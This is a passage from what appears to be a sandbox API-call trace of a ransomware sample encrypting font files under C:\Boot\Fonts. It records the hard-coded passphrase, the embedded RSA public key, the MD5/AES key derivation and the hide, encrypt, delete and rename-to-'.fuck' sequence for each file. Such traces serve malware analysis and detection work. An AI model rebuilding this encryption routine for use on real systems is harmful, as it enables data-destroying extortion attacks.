1 [0127.005] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27eccc8) returned 1 [0127.007] CryptCreateHash (in: hProv=0x27eccc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.007] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.007] CryptHashData (hHash=0x69d428, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.007] CryptDeriveKey (in: hProv=0x27eccc8, Algid=0x6610, hBaseData=0x69d428, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d6e8) returned 1 [0127.007] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.007] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.007] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ed190) returned 1 [0127.007] CryptImportPublicKeyInfo (in: hCryptProv=0x27ed190, dwCertEncodingType=0x1, pInfo=0x27da5e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27da618*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27da620*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dda8) returned 1 [0127.007] CryptEncrypt (in: hKey=0x69dda8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.007] CryptEncrypt (in: hKey=0x69dda8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ed548*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ed548*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.007] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ed548*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ed548*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.008] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27faa88, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27faa88, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.008] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27faa88*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27faa88*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.008] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27faa88*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27faa88*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.008] CloseHandle (hObject=0xffffffff) returned 1 [0127.008] CloseHandle (hObject=0x5cd8) returned 1 [0127.009] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), bFailIfExists=0) returned 0 [0127.012] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf", dwFileAttributes=0x0) returned 0 [0127.012] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf.gsg")) returned 1 [0127.013] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\msjh_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf.fuck")) returned 0 [0127.014] CryptDestroyHash (hHash=0x69d428) returned 1 [0127.014] CryptDestroyKey (hKey=0x69d6e8) returned 1 [0127.014] CryptReleaseContext (hProv=0x27eccc8, dwFlags=0x0) returned 1 [0127.014] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.014] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.014] GetLastError () returned 0x5 [0127.014] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf")) returned 0x20 [0127.015] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf", dwFileAttributes=0x80) returned 0 [0127.015] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.016] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.016] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0127.016] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed218) returned 1 [0127.018] CryptCreateHash (in: hProv=0x27ed218, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.018] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.018] CryptHashData (hHash=0x69d6e8, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.018] CryptDeriveKey (in: hProv=0x27ed218, Algid=0x6610, hBaseData=0x69d6e8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0127.018] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.018] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.018] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ed5d0) returned 1 [0127.018] CryptImportPublicKeyInfo (in: hCryptProv=0x27ed5d0, dwCertEncodingType=0x1, pInfo=0x27daed8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27daf08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27daf10*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69df28) returned 1 [0127.018] CryptEncrypt (in: hKey=0x69df28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.018] CryptEncrypt (in: hKey=0x69df28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27eccc8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27eccc8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.019] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27eccc8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27eccc8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.019] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27fae90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27fae90, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.019] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fae90*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27fae90*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.019] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27fae90*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27fae90*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.020] CloseHandle (hObject=0xffffffff) returned 1 [0127.020] CloseHandle (hObject=0x5cd8) returned 1 [0127.020] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), bFailIfExists=0) returned 0 [0127.023] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf", dwFileAttributes=0x0) returned 0 [0127.024] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf.gsg")) returned 1 [0127.025] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\msyhn_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\msyhn_boot.ttf.fuck")) returned 0 [0127.025] CryptDestroyHash (hHash=0x69d6e8) returned 1 [0127.025] CryptDestroyKey (hKey=0x69d428) returned 1 [0127.025] CryptReleaseContext (hProv=0x27ed218, dwFlags=0x0) returned 1 [0127.025] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.025] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.025] GetLastError () returned 0x5 [0127.025] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf")) returned 0x20 [0127.026] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf", dwFileAttributes=0x80) returned 0 [0127.026] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.026] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.026] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0127.027] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed218) returned 1 [0127.029] CryptCreateHash (in: hProv=0x27ed218, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.029] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.029] CryptHashData (hHash=0x69d368, pbData=0x5bcdb8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.029] CryptDeriveKey (in: hProv=0x27ed218, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d6e8) returned 1 [0127.029] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.029] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.029] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ecf70) returned 1 [0127.030] CryptImportPublicKeyInfo (in: hCryptProv=0x27ecf70, dwCertEncodingType=0x1, pInfo=0x27da9f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27daa28*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27daa30*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69df68) returned 1 [0127.030] CryptEncrypt (in: hKey=0x69df68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.030] CryptEncrypt (in: hKey=0x69df68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ecff8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ecff8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.030] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ecff8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ecff8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.032] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27fae90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27fae90, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.032] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fae90*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27fae90*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.032] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27fae90*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27fae90*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.032] CloseHandle (hObject=0xffffffff) returned 1 [0127.032] CloseHandle (hObject=0x5cd8) returned 1 [0127.033] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), bFailIfExists=0) returned 0 [0127.036] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf", dwFileAttributes=0x0) returned 0 [0127.036] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf.gsg")) returned 1 [0127.037] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\msyh_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\msyh_boot.ttf.fuck")) returned 0 [0127.037] CryptDestroyHash (hHash=0x69d368) returned 1 [0127.037] CryptDestroyKey (hKey=0x69d6e8) returned 1 [0127.037] CryptReleaseContext (hProv=0x27ed218, dwFlags=0x0) returned 1 [0127.037] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.037] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.038] GetLastError () returned 0x5 [0127.038] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf")) returned 0x20 [0127.038] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf", dwFileAttributes=0x80) returned 0 [0127.038] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.039] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.039] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0127.039] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed080) returned 1 [0127.041] CryptCreateHash (in: hProv=0x27ed080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.041] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.041] CryptHashData (hHash=0x69d368, pbData=0x5bcf98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.041] CryptDeriveKey (in: hProv=0x27ed080, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d6e8) returned 1 [0127.041] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.041] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.041] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ed218) returned 1 [0127.041] CryptImportPublicKeyInfo (in: hCryptProv=0x27ed218, dwCertEncodingType=0x1, pInfo=0x27daac8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27daaf8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27dab00*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dea8) returned 1 [0127.041] CryptEncrypt (in: hKey=0x69dea8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.041] CryptEncrypt (in: hKey=0x69dea8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27edba8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27edba8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.041] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27edba8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27edba8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.042] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27fae90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27fae90, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.042] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fae90*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27fae90*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.042] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27fae90*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27fae90*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.042] CloseHandle (hObject=0xffffffff) returned 1 [0127.042] CloseHandle (hObject=0x5cd8) returned 1 [0127.043] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), bFailIfExists=0) returned 0 [0127.046] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf", dwFileAttributes=0x0) returned 0 [0127.047] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf.gsg")) returned 1 [0127.048] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\segmono_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\segmono_boot.ttf.fuck")) returned 0 [0127.048] CryptDestroyHash (hHash=0x69d368) returned 1 [0127.048] CryptDestroyKey (hKey=0x69d6e8) returned 1 [0127.048] CryptReleaseContext (hProv=0x27ed080, dwFlags=0x0) returned 1 [0127.048] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.048] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.048] GetLastError () returned 0x5 [0127.048] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf")) returned 0x20 [0127.048] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf", dwFileAttributes=0x80) returned 0 [0127.048] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.048] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.049] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0127.049] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed080) returned 1 [0127.051] CryptCreateHash (in: hProv=0x27ed080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.051] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.051] CryptHashData (hHash=0x69d368, pbData=0x5bd010, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.051] CryptDeriveKey (in: hProv=0x27ed080, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0127.051] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, 